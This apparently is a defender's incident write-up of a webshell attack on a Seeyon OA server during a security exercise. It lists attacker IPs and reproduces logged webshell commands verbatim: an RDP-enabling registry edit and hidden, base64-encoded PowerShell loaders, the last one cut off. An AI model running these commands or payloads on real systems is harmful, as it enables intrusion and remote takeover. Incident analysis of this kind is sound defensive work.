致远oa系统恢复流程(记一次捕获野生0day-致远OA系统)(1)

危害级别:【危急】

验证版本:

A8 V7.0 SP3、A8 V6.1 SP2

触发条件:没有限制。

在护网结束的倒数第三天,发现攻击方异常凶猛,各种藏着捂着的招式都使用出来了,突然发现被上传shell的告警,吓的我赶紧去分析日志看看攻击队是怎么进来的。

分析

致远oa系统恢复流程(记一次捕获野生0day-致远OA系统)(2)

成功攻击者正在执行相关命令

致远oa系统恢复流程(记一次捕获野生0day-致远OA系统)(3)

发现攻击者传了shell后在时刻变换IP访问,猜测使用了代理IP池,梳理攻击者全部IP

115.202.225.148 60.187.167.102 111.179.177.146 112.85.8.20 115.151.176.91 112.91.75.39 112.195.136.219 101.206.233.60 115.202.49.93 101.26.130.123 115.209.76.29 113.121.170.208 101.26.54.119 114.217.155.27 106.46.110.197 60.169.240.181 60.182.24.83 114.98.175.7

根据告警信息及系统日志,在服务器根目录下面发现木马文件

致远oa系统恢复流程(记一次捕获野生0day-致远OA系统)(4)

木马内容为:

致远oa系统恢复流程(记一次捕获野生0day-致远OA系统)(5)

在日志当中排查攻击者执行的相关行为,提取攻击者所有操作行为

致远oa系统恢复流程(记一次捕获野生0day-致远OA系统)(6)

致远oa系统恢复流程(记一次捕获野生0day-致远OA系统)(7)

pwd=asasd3344&cmd=whoami pwd=asasd3344&cmd=tasklist pwd=asasd3344&cmd=cmd /c type 3389.reg pwd=asasd3344&cmd=cmd /c tasklist pwd=asasd3344&cmd=cmd /c regedit /s 3389.reg pwd=asasd3344&cmd=cmd /c netstat -ano pwd=asasd3344&cmd=cmd /c echo Windows Registry Editor Version 5.00>>3389.reg pwd=asasd3344&cmd=cmd /c echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg pwd=asasd3344&cmd=cmd /c echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg pwd=asasd3344&cmd=cmd /c echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg pwd=asasd3344&cmd=cmd /c echo "PortNumber"=dword:00000d3d>>3389.reg pwd=asasd3344&cmd=cmd /c echo "fDenyTSConnections"=dword:00000000>>3389.reg pwd=asasd3344&cmd=cmd /c dir D:\OASYS\Seeyon\A8\ApacheJetspeed\webapps\seeyon\ pwd=asasd3344&cmd=cmd /c dir pwd=asasd3344&cmd=cmd /c del D:\OASYS\Seeyon\A8\ApacheJetspeed\webapps\seeyon\test123456.jsp pwd=asasd3344&cmd=cmd /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAmACgAWwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQA6ADoAYwByAGUAYQB0AGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnACcASAA0AHMASQBBAEgALwBUAEUAbAAwAEMAQQA3AFYAVwBiAFcAKwBiAFMAQgBEACsAbgBFAGoANQBEADYAaQB5AEIAQwBpAE8AagBWAE8AbgBUAFMATgBWAE8AcgBBAGgAeAByAFYAVABVADIAegBzADIARwBlAGQATQBLAHgAaAA0ADIAVQBoAHMATQBRAG0AdgBmADcAMwBtADcAVQBoAFQAYQAvAHAAWABYAHYAUwBJAFMAVAAyAFoAVgA2AGUAbQBYAGwAMgBoADMAVgBPAFAAWQBaAGoASwBuAGkASgBKAFgAdwArAE8AVAA0AGEAdQBhAGsAYgBDAFYATABOAHUAMgBqAFgAaABkAG8AcQBVAE8AUwBqAEkAMQBpAHUAWgBmAGQATwBJAEwAdwBYAHAASQBXAGEASgBOADAANABjAGoARgBkAFgAbAAxADEAOABqAFIARgBsAEIAMwBtAGoAVwB2AEUAMQBDAHgARAAwAFkAcABnAGwARQBtAHkAOABLAGMAdwBEAFYARwBLAHoAagA2AHUANwBwAEQASABoAE0AOQBDADcAWQAvAEcATgBZAGwAWABMAGkAbgBGAGkAbwA3AHIAaABVAGcANABVADYAbgBQADkAdwBhAHgANQAzAEkAcwBEAFQAcwBoAG0ARQBuAGkANwA3ACsATAA4AHUASwBzAHQAVwB6AG8AOQA3AGwATABNAGsAbQAwAGkANAB5AGgAcQBPAEUAVABJAHMAcgBDAEYANQBrADcASABCAGMASgBrAHMAUQBoADkAdABJADQAaQA5AGUAcwBNAGMAWAAwADkAWABsAGoAUQBqAE4AMwBqAFcANwBBADIAZwBNAGEASQBoAGIARwBmAGkAYgBLAEUAQQBXADgASwBXAEoANQBTAG8AVgA5AFAATgB6AEEAWQBWAHMAUwBZAFQAaABLAFkAMAAvADEALwBSAFIAbABtAFYAZwBYAEYAdAB6ADAAWQByAG4AOABUAFYAcQBVAGYAagAvAGwAbABPAEUASQBOAFUAegBLAFUAQgBvAG4ATgBrAG8AZgBzAEkAZQB5AFIAcwArAGwAUABrAEcAZgAwAEgAbwBKAFcAagBaAEwATQBRADIAVwBzAGcAeABpAEQALwBFAEcAUwBUAFcAYQBFADEASQBYAGYAcwBXAE0AZABJAE8AMgBWAGQAWgArAFYAawBsADYAcgBnAFIAUwBJADUAYgBLAGQAYQBqAGoAQwAzAEUATwBZAHoAOABuADYASwBBAHAAdgBnAEMAVQAxADEANgBHAHAANgB3AC8ASgBPADcATAB5AGYASABKADgAYgBxAGkAeQByADMAZABmAGsANABWAEcAQgAwAHQAOQBtAE0ARQAyAEsAUgBSAG4ATwBHADkAMgBIAHQAQgBxAFEAdABEADgATwBLAHkATwBDADEAZwBXAGgAdQBuAE8AWgBLAFgAVAA1AGsAVgBhAGsAaQA3AHEALwA5AFkAdgBWAFgASgBnAGkAVABoADUARgBzADQATQBmAGEAWABvAEYARABXAHMAZwBaAFYANQBzAHMALwBwAG0AUQBYAHIAVABGAEYAMwBZAEsANgBFAGYAWQBxADEAawBrAHYANQBSAGUAdABDAGQAcQBIADEANgBqAEUAYgBnAEMAUgBKAEoAWQBiAHkATwA4AGkAZwBnAEsAWAA4AFkAegB4AE0AbgArAG4AcABrAGUAWQBQAGUAbABxAE8AUwBZACsAUwBsAFUAUABhAHAAUQBCAEsAaQBpAGYALwBDADIAWQBRAHgARQBrADAAYQBSAEQARgBFAEYAKwBEAG4AUABnAFgAVwAwAE4AWABFAGUAVgBkAE0AbgB2AG8AdgBMAE8ANQB5AEEAawBkAG8AaQBiAFoAWABWAGgAbABNAE4AaAA4ACsAcQBDAGoAVgB5AEMALwBMAHEAZwAwAGcAeQBYAFcAMgByAE8ANAB2ADEAUQAvAEEAcAAzAG0AQgBPAEcAUABUAGQAagBsAGIAbQBsAFgASwBhAHgAZABOAGUASgBhAGMAYgBTADMASQBPAEsAUQBlAGgAagBPADAARQBlAGQAZwBuAFAAUgBGADMAbwBZAFIAOQBwAGgAWQAyAEQAeQBxADMANABZAGgANAA2AEwAaQBGAHcAQQBzAEQAUwBBADkAUQBCAFYAbgBqADgATgB1AE0AOABTAEEARQBoAHIANwBuAGMAcwBCAEUAegBvADQAUwBnAEMARQBUADIAWgA5ADQAZwBiAGcAQQBuAHYASwBUADUAbgBqAGQAdQBnAEgAegB4AGIALwBnAHEARgBoADgAbwB5AHgATgBSAFoAZQBBAFoATwBxAGkAdQBUAFcASgBXAEYAeAB5AGMATQByAGcANQBlAEYASgBKADgASgA5AGMAUAA3ADgAdwBBAEUAUQBuAFIAVwBVAE4AcABPAHAAVQBMAEwAUwBDAGMAVABMAFgASAB2AFUAZAA1ADIASwBaAGsASAAzADQASwBZAFAAUQBqAFQAUwBPAE4ARABkAEQAYgA5AHEASABxADAARgA2ADEAZABSAHgAOQAyAEwAVQBqAFIAOQBWAGUASABUAGoAawArAFYAbwA5AHMAUwBaAG0AMABPAC8AVAAyAHkAVAAyAGIAYwA2AEgAawB6AEMAMABNAFEAdABNADQAQgA1AE0AZABHAEQARQBWAE8AUwBEACsATgB4AHIAMgA5ADMAZQAyAHIAYQAzAFkAVgByADEAYwB4AE0AdgBhAGMAVgBWAGsAdABUAHYAUgA1ACsANgAvAFMAMQB5AFEAVAAwAGMARwBkAGcAMwBlADEATQAxAGQAZQBpAFkAQgBiAGMAZAByAGIAbQBLAEoAeQBaADQASwBnAHoAQwBNAHcAQQB2AHAAbwBaAGUAcABvAHkAVgB3AEoATgBNAFQAbwBEAFcAdwB0ADEAcgBLAGkAQgBiAGYAVwBzAGQAbQB0AHUATgBpACsASgBoAGgAOQB0ADAAMQBaADcAMAB5AGQALwBUADMANwAwAGQAcgBzADMAMgA0ADMAVgBtADIARgBmAEQAWQAyAFAAdgB0AEUANgBOAC8AYgA2AEcANgA0AC8AMwAxAHcAUAB1AHYAcAArADcAdgBHADUAZABaAHYAcABXAEEAYwAvAHUAbgBGAHIATwBTAEcAYQBPAG8AawAyADEAWQAyADUANQBTAFIAbQBjAEwAbwBOAEwARwBmAFEAYgBCAHUAaABCAHUAcwBtADMAZwAwAFMAdQB3AGwAUABxADkAVgAvAG8AUAA3AGoAawBGAHcAKwBEAGcARwB1ADUAYwB6ADcARwBNADMATgBBAEIAVwBCAGEAcQBtAHEAZgBVAHUASgB2AGQAcAAyAFYAUABYADYAcgBVAGYAbgA0ADQAdQBOAE0AWQBHADEAegBkAGkAawBPADIAdQBWAEQAUAAzAGkAdAB0AGQAOAA1AHcAdwB4AFMAbQBMAFYAMABsAFgAVgBJAEgAQQBXAEkAOQBYAGQAZABwAHUAdABhAGYAegBCAGMAaQA2AHMAaQBhADcAcwBpAG8AbQB5ADIAKwBwADMAegBhADIATwArADkAdABOACsAWgAxAGMAdgAzAGsAVABOAE4AZgB0AFUAZABPAHgAVABkAHAAegBRAHcAMwB3AEYAdgAzADIAQgB2AGQAUABZAFMAOQB5AEgAZQBWADIAMwBYAFIANAAvAHIAbwA2AGIAVAA3AFMARwBYAEYASABuAFYAWgBNAFYAcwAzAFcAQgBIAGYAZgBhAHAAcQBKAFUAZgA5AG0ANgBKAEYANwBEAFcASQBHAEcAeABmAFcASwB1ADYAYwBlACsARQBhAE0ASgBuAEIAcABSAFgATQBZAG4AcgB1AGIAcwBEAHUATgBGAEEAQgBIAGMAUQBIAGQAVgA3ADMAVABkAEQAUgBjAG8ASQAzAGsAOQBNAFoAdAA5AFgAZgBLAGwARgAvAHAAMwBDAGMAVQBmADgAUwBzAEoAMgBYAEcARgBSAEcAegBWAGsAVAA4AEsAbQA5AHIAdAAyAGgAMQA3AFkANQBPAC8AZQBSAG8AVABWAFAAdgBmAGUAdgBPAEcATwBCAHMAagBVADAAZQBQAGUATQBpAGoAOQBxAEgAVQBNADMAegBVAEsAWABBAEUAVwBoAEoAMQBRAFgAZwBoAEcAbgBSAG4AbgBQAGoAMgBMAE0ATgBTAFMASgAvAHgAcABzAFUARQBvAFIAZwBkAFkASwB6AGIAYwA2AFYAeQBvAGgAcwBjAGUAYgBEAEcAOABJADAATgA4AE8AWABZAGMAMwB3AFEAawBNAFgANQArAC8ATwBKAEsARgBKADAASAA1AGEAKwArAHAAbABxADYAdQA1AG8AQQBSAGoAaQBxAGMAcABzAFkAQQAwAFkAQwBGAGQAVwBYADMAVwBsAEcAZwBsAFMAaQA3AHQAZwBJAFIALwBuAHgAWQBuAFQAZwBwAEoARwA2AHAAegBqAHMAUgB6ADAAcABwAG0ATwB3AE4AeQAvAHoANAAxAG4ASgBGAGUANQBqACsAcgA5AGsAcQBMADQAMABRAFAAdgA2AC8AWgBPAHYAcgAyAGoALwBzAC8AbABRAEcAbABmAG8AKwAzAHUAOQBXAHYAMQAzADQAcABYAFQAKwBhAHQAeABUAEYAegBNAFEAdABPAEgATwBJACsAagBRAGIAVgA4AE0AdgArAFQARgBzAHgAKwBSAGYAVQAyAGcANwB1AHYAeQA0AGIAKwBTAEgAMwBOADIAZABnAE0ALwBLAEMAZgBIAGYAdwBIADIAZwB3AHkAdABzAHcAbwBBAEEAQQA9AD0AJwAnACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA pwd=asasd3344&cmd=cmd /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAmACgAWwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQA6ADoAYwByAGUAYQB0AGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnACcASAA0AHMASQBBAEgALwBUAEUAbAAwAEMAQQA3AFYAVwBiAFcAKwBiAFMAQgBEACsAbgBFAGoANQBEADYAaQB5AEIAQwBpAE8AagBWAE8AbgBUAFMATgBWAE8AcgBBAGgAeAByAFYAVABVADIAegBzADIARwBlAGQATQBLAHgAaAA0ADIAVQBoAHMATQBRAG0AdgBmADcAMwBtADcAVQBoAFQAYQAvAHAAWABYAHYAUwBJAFMAVAAyAFoAVgA2AGUAbQBYAGwAMgBoADMAVgBPAFAAWQBaAGoASwBuAGkASgBKAFgAdwArAE8AVAA0AGEAdQBhAGsAYgBDAFYATABOAHUAMgBqAFgAaABkAG8AcQBVAE8AUwBqAEkAMQBpAHUAWgBmAGQATwBJAEwAdwBYAHAASQBXAGEASgBOADAANABjAGoARgBkAFgAbAAxADEAOABqAFIARgBsAEIAMwBtAGoAVwB2AEUAMQBDAHgARAAwAFkAcABnAGwARQBtAHkAOABLAGMAdwBEAFYARwBLAHoAagA2AHUANwBwAEQASABoAE0AOQBDADcAWQAvAEcATgBZAGwAWABMAGkAbgBGAGkAbwA3AHIAaABVAGcANABVADYAbgBQADkAdwBhAHgANQAzAEkAcwBEAFQAcwBoAG0ARQBuAGkANwA3ACsATAA4AHUASwBzAHQAVwB6AG8AOQA3AGwATABNAGsAbQAwAGkANAB5AGgAcQBPAEUAVABJAHMAcgBDAEYANQBrADcASABCAGMASgBrAHMAUQBoADkAdABJADQAaQA5AGUAcwBNAGMAWAAwADkAWABsAGoAUQBqAE4AMwBqAFcANwBBADIAZwBNAGEASQBoAGIARwBmAGkAYgBLAEUAQQBXADgASwBXAEoANQBTAG8AVgA5AFAATgB6AEEAWQBWAHMAUwBZAFQAaABLAFkAMAAvADEALwBSAFIAbABtAFYAZwBYAEYAdAB6ADAAWQByAG4AOABUAFYAcQBVAGYAagAvAGwAbABPAEUASQBOAFUAegBLAFUAQgBvAG4ATgBrAG8AZgBzAEkAZQB5AFIAcwArAGwAUABrAEcAZgAwAEgAbwBKAFcAagBaAEwATQBRADIAVwBzAGcAeABpAEQALwBFAEcAUwBUAFcAYQBFADEASQBYAGYAcwBXAE0AZABJAE8AMgBWAGQAWgArAFYAawBsADYAcgBnAFIAUwBJADUAYgBLAGQAYQBqAGoAQwAzAEUATwBZAHoAOABuADYASwBBAHAAdgBnAEMAVQAxADEANgBHAHAANgB3AC8ASgBPADcATAB5AGYASABKADgAYgBxAGkAeQByADMAZABmAGsANABWAEcAQgAwAHQAOQBtAE0ARQAyAEsAUgBSAG4ATwBHADkAMgBIAHQAQgBxAFEAdABEADgATwBLAHkATwBDADEAZwBXAGgAdQBuAE8AWgBLAFgAVAA1AGsAVgBhAGsAaQA3AHEALwA5AFkAdgBWAFgASgBnAGkAVABoADUARgBzADQATQBmAGEAWABvAEYARABXAHMAZwBaAFYANQBzAHMALwBwAG0AUQBYAHIAVABGAEYAMwBZAEsANgBFAGYAWQBxADEAawBrAHYANQBSAGUAdABDAGQAcQBIADEANgBqAEUAYgBnAEMAUgBKAEoAWQBiAHkATwA4AGkAZwBnAEsAWAA4AFkAegB4AE0AbgArAG4AcABrAGUAWQBQAGUAbABxAE8AUwBZACsAUwBsAFUAUABhAHAAUQBCAEsAaQBpAGYALwBDADIAWQBRAHgARQBrADAAYQBSAEQARgBFAEYAKwBEAG4AUABnAFgAVwAwAE4AWABFAGUAVgBkAE0AbgB2AG8AdgBMAE8ANQB5AEEAawBkAG8AaQBiAFoAWABWAGgAbABNAE4AaAA4ACsAcQBDAGoAVgB5AEMALwBMAHEAZwAwAGcAeQBYAFcAMgByAE8ANAB2ADEAUQAvAEEAcAAzAG0AQgBPAEcAUABUAGQAagBsAGIAbQBsAFgASwBhAHgAZABOAGUASgBhAGMAYgBTADMASQBPAEsAUQBlAGgAagBPADAARQBlAGQAZwBuAFAAUgBGADMAbwBZAFIAOQBwAGgAWQAyAEQAeQBxADMANABZAGgANAA2AEwAaQBGAHcAQQBzAEQAUwBBADkAUQBCAFYAbgBqADgATgB1AE0AOABTAEEARQBoAHIANwBuAGMAcwBCAEUAegBvADQAUwBnAEMARQBUADIAWgA5ADQAZwBiAGcAQQBuAHYASwBUADUAbgBqAGQAdQBnAEgAegB4AGIALwBnAHEARgBoADgAbwB5AHgATgBSAFoAZQBBAFoATwBxAGkAdQBUAFcASgBXAEYAeAB5AGMATQByAGcANQBlAEYASgBKADgASgA5AGMAUAA3ADgAdwBBAEUAUQBuAFIAVwBVAE4AcABPAHAAVQBMAEwAUwBDAGMAVABMAFgASAB2AFUAZAA1ADIASwBaAGsASAAzADQASwBZAFAAUQBqAFQAUwBPAE4ARABkAEQAYgA5AHEASABxADAARgA2ADEAZABSAHgAOQAyAEwAVQBqAFIAOQBWAGUASABUAGoAawArAFYAbwA5AHMAUwBaAG0AMABPAC8AVAAyAHkAVAAyAGIAYwA2AEgAawB6AEMAMABNAFEAdABNADQAQgA1AE0AZABHAEQARQBWAE8AUwBEACsATgB4AHIAMgA5ADMAZQAyAHIAYQAzAFkAVgByADEAYwB4AE0AdgBhAGMAVgBWAGsAdABUAHYAUgA1ACsANgAvAFMAMQB5AFEAVAAwAGMARwBkAGcAMwBlADEATQAxAGQAZQBpAFkAQgBiAGMAZAByAGIAbQBLAEoAeQBaADQASwBnAHoAQwBNAHcAQQB2AHAAbwBaAGUAcABvAHkAVgB3AEoATgBNAFQAbwBEAFcAdwB0ADEAcgBLAGkAQgBiAGYAVwBzAGQAbQB0AHUATgBpACsASgBoAGgAOQB0ADAAMQBaADcAMAB5AGQALwBUADMANwAwAGQAcgBzADMAMgA0ADMAVgBtADIARgBmAEQAWQAyAFAAdgB0AEUANgBOAC8AYgA2AEcANgA0AC8AMwAxAHcAUAB1AHYAcAArADcAdgBHADUAZABaAHYAcABXAEEAYwAvAHUAbgBGAHIATwBTAEcAYQBPAG8AawAyADEAWQAyADUANQBTAFIAbQBjAEwAbwBOAEwARwBmAFEAYgBCAHUAaABCAHUAcwBtADMAZwAwAFMAdQB3AGwAUABxADkAVgAvAG8AUAA3AGoAawBGAHcAKwBEAGcARwB1ADUAYwB6ADcARwBNADMATgBBAEIAVwBCAGEAcQBtAHEAZgBVAHUASgB2AGQAcAAyAFYAUABYADYAcgBVAGYAbgA0ADQAdQBOAE0AWQBHADEAegBkAGkAawBPADIAdQBWAEQAUAAzAGkAdAB0AGQAOAA1AHcAdwB4AFMAbQBMAFYAMABsAFgAVgBJAEgAQQBXAEkAOQBYAGQAZABwAHUAdABhAGYAegBCAGMAaQA2AHMAaQBhADcAcwBpAG8AbQB5ADIAKwBwADMAegBhADIATwArADkAdABOACsAWgAxAGMAdgAzAGsAVABOAE4AZgB0AFUAZABPAHgAVABkAHAAegBRAHcAMwB3AEYAdgAzADIAQgB2AGQAUABZAFMAOQB5AEgAZQBWADIAMwBYAFIANAAvAHIAbwA2AGIAVAA3AFMARwBYAEYASABuAFYAWgBNAFYAcwAzAFcAQgBIAGYAZgBhAHAAcQBKAFUAZgA5AG0ANgBKAEYANwBEAFcASQBHAEcAeABmAFcASwB1ADYAYwBlACsARQBhAE0ASgBuAEIAcABSAFgATQBZAG4AcgB1AGIAcwBEAHUATgBGAEEAQgBIAGMAUQBIAGQAVgA3ADMAVABkAEQAUgBjAG8ASQAzAGsAOQBNAFoAdAA5AFgAZgBLAGwARgAvAHAAMwBDAGMAVQBmADgAUwBzAEoAMgBYAEcARgBSAEcAegBWAGsAVAA4AEsAbQA5AHIAdAAyAGgAMQA3AFkANQBPAC8AZQBSAG8AVABWAFAAdgBmAGUAdgBPAEcATwBCAHMAagBVADAAZQBQAGUATQBpAGoAOQBxAEgAVQBNADMAegBVAEsAWABBAEUAVwBoAEoAMQBRAFgAZwBoAEcAbgBSAG4AbgBQAGoAMgBMAE0ATgBTAFMASgAvAHgAcABzAFUARQBvAFIAZwBkAFkASwB6AGIAYwA2AFYAeQBvAGgAcwBjAGUAYgBEAEcAOABJADAATgA4AE8AWABZAGMAMwB3AFEAawBNAFgANQArAC8ATwBKAEsARgBKADAASAA1AGEAKwArAHAAbABxADYAdQA1AG8AQQBSAGoAaQBxAGMAcABzAFkAQQAwAFkAQwBGAGQAVwBYADMAVwBsAEcAZwBsAFMAaQA3AHQAZwBJAFIALwBuAHgAWQBuAFQAZwBwAEoARwA2AHAAegBqAHMAUgB6ADAAcABwAG0ATwB3AE4AeQAvAHoANAAxAG4ASgBGAGUANQBqACsAcgA5AGsAcQBMADQAMABRAFAAdgA2AC8AWgBPAHYAcgAyAGoALwBzAC8AbABRAEcAbABmAG8AKwAzAHUAOQBXAHYAMQAzADQAcABYAFQAKwBhAHQAeABUAEYAegBNAFEAdABPAEgATwBJACsAagBRAGIAVgA4AE0AdgArAFQARgBzAHgAKwBSAGYAVQAyAGcANwB1AHYAeQA0AGIAKwBTAEgAMwBOADIAZABnAE0ALwBLAEMAZgBIAGYAdwBIADIAZwB3AHkAdABzAHcAbwBBAEEAQQA9AD0AJwAnACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApA pwd=asasd3344&cmd=cmd /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAmACgAWwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQA6ADoAYwByAGUAYQB0AGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnACcASAA0AHMASQBBAE0ALwBOAEUAbAAwAEMAQQA3AFYAVwAvAFcAKwBhAFcAaABqACsAdQBVADMANgBQADUARABGAFIARQBpAHQAbwByAE4AcgAxADIAVABKAEIAWQBXAEsAawAwADYARwBvAHQAVwBaAG0AMQBNADQAdwBxAG0ASABBADQATgBEAGwAZQA3AHUAZgA3ADgAdgBDAGwAMgBYAGQAYwB0ADIAawAwAHQASQBPAEIALwB2ADUALwBNACsANQA3AHkAcwBNACsAWgB5AEUAagBIAGgAYwBjAFoATgA0AGMAdgBKADgAZABFAFkASgBTAGcAVQB4AEYAcQBtADQAWQBaAFEASQB6AGgATABwAEsATQBqAFcASwArAHQAbgBmAFMAOQA4AEUANABRAGwAMABvAGMAOQA2AE0AUQBFAGIAYQA2AHUAdQBwAGwAUwBZAEkAWgB